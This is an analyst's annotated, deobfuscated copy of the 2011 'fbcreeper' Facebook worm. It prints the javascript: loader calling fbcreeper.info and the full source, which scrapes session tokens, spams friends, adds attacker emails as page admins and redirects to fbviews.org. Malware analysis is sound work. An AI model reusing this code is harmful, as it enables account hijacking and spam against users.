Deobfuscated fb malware

1. /*
2. Deobfuscated & documented version of the "fbcreeper" facebook malware.
3. ======================================================================
4.  
5. Malware web-page:
6. http://fbcreeper.info/
7. http://procreeper.info/
8. http://profilechecker.info/
9. http://thefbcreeper.info/
10.  
11. Description:
12. This malware advertises that it can gather statistics about user's
13. contacts visits to her profile. Instead this is what it does:
14. * Posts links on victim's wall, which advertise the malware
15. * Posts links to victim's contacts' walls, which advertise
16. the malware.
17. * Posts links to pages created or administered by victim, advertising
18. the malware and adding users with emails lethaburbach890@yahoo.com and
19. chunfeezellwytm@hotmail.com to the pages' administators group.
20. * Sends private messages, advertising the malware
21. * Likes pages "DJ-Emphatic" and "OH Whutt" with user's account
22. * Invites all contacts to an event (which is removed at the time
23. of this analysis)
24.  
25. As of now (22nd February 2011, 23:03 GMT+2), somewhere between
26. 11,000 and 20,000 Facebook accounts are infected.
27.  
28. The malware is injected through address bar with the code snippet
29. below:
30. javascript: (a = (d = document).createElement("script")).src =
31. "http://fbcreeper.info/StalkerTools.fb"; void(d.body.appendChild(a))
32.  
33. Karagasidis Dimitris,
34. http://gatoni.gr
35. */
36.  
37. /* Shortened URLs pointing to malware's web-page */
38. goog1="http://goo.gl/ixMjn";
39. goog2="http://tinyurl.com/48jd66w";
40. goog3="http://tinyurl.com/procreeper";
41. goog4="http://goo.gl/rLvls";
42. goog5="http://goo.gl/NMclq";
43. goog6="http://goo.gl/YHp4X";
44.  
45. /* Malware's facebook pages and evens */
46. event_id="168046893242650"; // As of 22nd February of 2011, this event is expired
47. page_id_x="136589129739532"; // DJ-Emphatic page on Facebook
48. page_id_xx="195926070436089"; // OH Whutt page on Facebook
49. admin_emails="lethaburbach890@yahoo.com,chunfeezellwytm@hotmail.com";
50.  
51. /* Statuses the malware posts on users' walls */
52. statuses = ["Wow! Seems like lots of people stalk me - " + goog1,
53. "New FB tool shows who stalks your profile-- " + goog2,
54. "Secret tool shows who stalks your pics " + goog3,
55. "Insane! Awesome tool to see who looks at your pics >> " + goog4,
56. "According to " + goog5 + " you're my top stalker. Creep.",
57. "Secret tool shows who stalks your pics - " + goog6];
58.  
59. /* Subjects of private messages the malware sends to users */
60. subjects = [ "Check this out!", "Hey, whats happening?", "Hey! This is awesome" ];
61.  
62. /* Extend Array type with a function which returns an element from a random index */
63. Array.prototype.randomize = function () {
64. return this[ Math.floor( Math.random() * this.length ) ];
65. };
66.  
67. /* Extend Object type with function to check the state of AJAX respose */
68. Object.prototype.isReady = function () {
69. if ( this.readyState == 4 && this.status == 200 ) {
70. return true;
71. }
72. else {
73. return false;
74. };
75. };
76.  
77. /* Extend String type with a function which returns user contacts' ids */
78. String.prototype.getFriends = function () {
79. friends2 = this.match( /facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi).join(":").replace(/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi,"").replace(/\\\\\\\">/gi,"&xhpc_composerid=").split(":").slice(1);
80. return friends2;
81. };
82.  
83. function _88xuhyr(_0x91e5x2){
84. /*
85. This function decodes and evaluates the _0x91e5x2 string, which
86. seems to be "encrypted" with a 24-character shift.
87.  
88. There seem to be no calls to this function from within the code,
89. so its purpose must be solely for obscurity reasons.
90. */
91. st = _0x91e5x2.split(",");
92. d = "";
93. for( i = 0; i < st.length; i++ ){
94. d += String.fromCharCode( st[i] - 24 );
95. };
96. eval(d);
97. };
98.  
99. function addAdmin( _0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7 ) {
100. /*
101. This function adds Facebook users with email accounts
102. lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com as
103. administrators to the pages you have created or administering.
104.  
105. _0x91e5x4 - Your page ID
106. _0x91e5x5 - A string containing comma-separated email addresses
107. _0x91e5x6, _0x91e5x7 - Your profile signatures
108. */
109. iemails = _0x91e5x5.split( "," );
110. main_emails = [];
111. for( i = 0; i < iemails.length; i++ ) {
112. main_emails[i]= "friendselector_input[]=" + iemails[i] + "&friend_selected[]=";
113. };
114. with ( newx = new XMLHttpRequest ) {
115. open("POST", "/pages/edit/?id=" + _0x91e5x4 + "&sk=admin" );
116. setRequestHeader( "Content-Type", "application/x-www-form-urlencoded" );
117. send( "post_form_id=" +
118. _0x91e5x6 +
119. "&fb_dtsg=" +
120. _0x91e5x7 +
121. "&fbpage_id=" +
122. _0x91e5x4 +
123. "&" +
124. main_emails.join("&") +
125. "&save=1"
126. );
127. } ;
128. };
129.  
130. function makePost( _0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc ) {
131. /*
132. This function prepares a status update, which is posted on
133. your contacts' walls.
134.  
135. _0x91e5x9 - the HTML code of your Facebook page, from which
136. your signature is extracted.
137. _0x91e5xa - the array of available statuses
138. _0x91e5xb - profile to which the status update will be posted
139. _0x91e5xc - not used in the function. Obfuscation I guess.
140. */
141. formx = _0x91e5x9.match(/name="post_form_id" value="([\d\w]+)"/)[1];
142. dtx = _0x91e5x9.match(/name="fb_dtsg" value="([^"]+)"/)[1];
143. composerx = _0x91e5x9.match(/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
144. msg = _0x91e5xa.randomize() + "";
145. text_post = "";
146. text_actual = "";
147. pxt = "post_form_id=" +
148. formx +
149. "&fb_dtsg=" +
150. dtx +
151. "&xhpc_composerid=" +
152. composerx +
153. "&xhpc_targetid=" +
154. _0x91e5xb.split("|")[0] +
155. "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" +
156. encodeURIComponent( msg + text_actual.replace( /\, $/,"" ) ) +
157. "&xhpc_message=" +
158. encodeURIComponent( msg + text_post.replace( /\, $/,"" ) ) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest";
159. update(pxt);
160. };
161.  
162. function update( _0x91e5xe ) {
163. /* This function posts status update with victim's account */
164. with( newx= new XMLHttpRequest){
165. open("POST","/ajax/updatestatus.php?__a=1");
166. setRequestHeader("Content-Type","application/x-www-form-urlencoded");
167. send(_0x91e5xe);
168. };
169. };
170.  
171. function loading(){
172. /* This function adds a simple user interface */
173. var _0x91e5x10 = document.createElement("div");
174. _0x91e5x10.id = "screwyouz";
175. _0x91e5x10.setAttribute("align","center");
176. _0x91e5x10.style.margin = "0px auto";
177. _0x91e5x10.style.position="absolute";
178. _0x91e5x10.style.top="10px";
179. _0x91e5x10.style.zindex="100";
180. _0x91e5x10.className="screwyou";
181. _0x91e5x10.innerHTML='<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';
182. document.body.appendChild(_0x91e5x10);
183. };
184.  
185. /* This is the malware's entry point */
186.  
187. /*
188. Extract victim's signatures, so the malware can post on victim's
189. contacts' walls
190. */
191. if ( window.location.href == "http://www.facebook.com/" ) {
192. formx = ( res = document.body.innerHTML ).match(/name="post_form_id" value="([\d\w]+)"/)[1];
193. dtx = res.match(/name="fb_dtsg" value="([^"]+)"/)[1];
194. composerx = res.match(/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
195. }
196. else {
197. /*
198. If not on main page, make an AJAX request, and then extract
199. victim's data.
200. */
201. with( muhaha = new XMLHttpRequest ) {
202. open( "GET", "/", false );
203. send(null);
204. };
205. formx = ( res = muhaha.responseText ).match(/name="post_form_id" value="([\d\w]+)"/)[1];
206. dtx=res.match(/name="fb_dtsg" value="([^"]+)"/)[1];
207. composerx=res.match(/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
208. };
209.  
210. /* A simple message box which informs that the malware runs */
211. alert("Hello! To activate the tool press Enter on your keyboard. This will take 2-3 minutes, while waiting please do not close this window or tab.");
212.  
213. /* Post malware advertising update on user's wall */
214. update( "post_form_id=" +
215. formx +
216. "&fb_dtsg=" +
217. "&xhpc_composerid=" +
218. composerx +
219. "&xhpc_targetid=" +
220. document.cookie.match(/c_user=(\d+)/)[1] +
221. "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" +
222. encodeURIComponent( stx = statuses.randomize() )+
223. "&xhpc_message=" +
224. encodeURIComponent(stx)+
225. "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest"
226. );
227.  
228. /* Like "DJ-Emphatic" page with victim's account */
229. with(newz= new XMLHttpRequest){
230. loading();
231. open("POST","/ajax/pages/fan_status.php?__a=1");
232. setRequestHeader("Content-Type","application/x-www-form-urlencoded");
233. send( "fbpage_id=" +
234. page_id_x +
235. "&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=" +
236. formx +
237. "&fb_dtsg=" +
238. dtx +
239. "&lsd&post_form_id_source=AsyncRequest"
240. );
241. };
242.  
243. /* Like "OH Whutt" page with victim's account */
244. with(newzz= new XMLHttpRequest){
245. open("POST","/ajax/pages/fan_status.php?__a=1");
246. setRequestHeader("Content-Type","application/x-www-form-urlencoded");
247. send( "fbpage_id=" +
248. page_id_xx +
249. "&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=" +
250. formx +
251. "&fb_dtsg=" +
252. dtx +
253. "&lsd&post_form_id_source=AsyncRequest"
254. );
255. };
256.  
257. void 0; // <- WTF?!
258.  
259. /*
260. Post with 3 seconds intervals, advertising messages on all contacts' walls.
261. If friends are less than 15, it posts private messages
262. */
263. with( fr = new XMLHttpRequest ) {
264. open( "GET", "/ajax/browser/list/friends/all/?uid=" +
265. (me = document.cookie.match(/c_user=(\d+)/)[1]) +
266. "&offset=0&dual=1&__a=1"
267. );
268.  
269. onreadystatechange=function (){
270. if( fr.isReady() ) {
271. friends=fr.responseText.getFriends();
272. idx=[];
273. for( i = 0; i < friends.length; i++ ) {
274. if( !isNaN(friends[i].split("|")[0]) ){
275. idx[i]= "ids[" + i + "]=" + friends[i].split("|")[0];
276. };
277. };
278. with(invi= new XMLHttpRequest){
279. open("POST","/ajax/social_graph/invite_dialog.php?__a=1");
280. setRequestHeader("Content-Type","application/x-www-form-urlencoded");
281. send( "post_form_id="+
282. formx+
283. "&fb_dtsg="+
284. dtx+
285. "&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&"+
286. idx.join("&")+
287. "&node_id=" +
288. event_id +
289. "&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest"
290. );
291. };
292. cnt_fr=0;
293. tx=setInterval(function (){
294. if( cnt_fr == friends.length ){
295. window.location="http://fbviews.org/result.php";
296. clearInterval(tx);
297. };
298. makePost( document.body.innerHTML, statuses, friends[cnt_fr], friends);
299. with( xa= new XMLHttpRequest ) {
300. open("GET","/ajax/messaging/composer.php?__a=1&__d=1");
301. onreadystatechange=function (){
302. if(xa.isReady()){
303. compi=xa.responseText.match(/([\d\w]+)_error/)[1];
304. pxi = "ids_"+
305. compi+
306. "[0]="+
307. friends[cnt_fr].split("|")[0]+
308. "&subject="+
309. encodeURIComponent( subjects.randomize() ) +
310. "&status="+
311. encodeURIComponent(statuses.randomize()) +
312. "&ids[0]="+
313. friends[cnt_fr].split("|")[0]+
314. "&action=send_new&home_tab_id=1&profile_id="+
315. document.cookie.match(/c_user=(\d+)/)[1]+
316. "&target_id=0&app_id=&&composer_id="+
317. compi+
318. "&hey_kid_im_a_composer=true&thread&post_form_id="+
319. formx+
320. "&fb_dtsg="+
321. dtx+
322. "&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest";
323. if( cnt_fr<15 ){
324. with(mi= new XMLHttpRequest){
325. open("POST","/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1");
326. setRequestHeader("Content-Type","application/x-www-form-urlencoded");
327. send(pxi);
328. };
329. };
330. };
331. };
332. send(null);
333. };
334. cnt_fr += 1;
335. } , 3000 );
336. } ;
337. };
338. send(null);
339. };
340.  
341. /*
342. Post advertising messages with 3 seconds interval on pages created or administered
343. by victim, and then add users with lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com
344. addresses as administrators to these pages
345. */
346. with( ins = new XMLHttpRequest ) {
347. open("GET","/insights/?_fb_noscript=1");
348. onreadystatechange=function (){
349. if(ins.isReady()){
350. ids=ins.responseText.match(/po_\d+">View/gi).join(":").replace(/(po_|">View)/gi,"").split(":");
351. cnt_pages=0;
352. tz=setInterval(function (){
353. if(cnt_pages==ids.length){
354. window.location="http://fbviews.org/result.php";
355. clearInterval(tz);
356. } ;
357. update( "post_form_id=" +
358. formx +
359. "&fb_dtsg=" +
360. dtx +
361. "&xhpc_composerid=" +
362. composerx +
363. "&xhpc_targetid=" +
364. ids[cnt_pages] +
365. "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text="+
366. encodeURIComponent( stx=statuses.randomize() ) +
367. "&xhpc_message=" +
368. encodeURIComponent(stx) +
369. "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest"
370. );
371. addAdmin( ids[cnt_pages], admin_emails, formx, dtx);
372. cnt_pages+=1;
373. } ,3000 );
374. } ;
375. } ;
376. send(null);
377. };